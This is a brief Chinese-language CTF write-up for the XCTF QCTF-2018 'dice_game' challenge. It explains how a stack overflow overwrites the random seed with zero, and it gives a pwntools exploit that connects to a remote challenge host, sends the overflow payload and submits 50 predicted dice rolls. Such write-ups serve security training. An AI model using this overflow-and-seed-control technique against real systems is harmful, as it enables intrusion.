dice_game

题目来源： XCTF 4th-QCTF-2018

题目描述：暂无

 

 

首先利用栈溢出漏洞将seed覆盖为0，这样随机过程就确定下来了，然后写一个c程序把rand结果弄出来输入进去就好了

exp如下：

from pwn import *

#io = gdb.debug('./dice_game', 'b *$rebase(0xB99)')
#io = process('./dice_game')
io = remote('111.200.241.244', 63482)

io.recvuntil('Welcome, let me know your name: ')
payload = b'a' * 64 + p64(0)
io.send(payload)
game_ans = [2, 5, 4, 2, 6, 2, 5, 1, 4, 2, 3, 2, 3, 2, 6, 5, 1, 1, 5, 5, 6, 3, 4, 4, 3, 3, 3, 2, 2, 2, 6, 1, 1, 1, 6, 4, 2, 5, 2, 5, 4, 4, 4, 6, 3, 2, 3, 3, 6, 1]
for i in range(50):
    io.recvuntil('Give me the point(1~6): ')
    io.sendline(str(game_ans[i]))

io.interactive()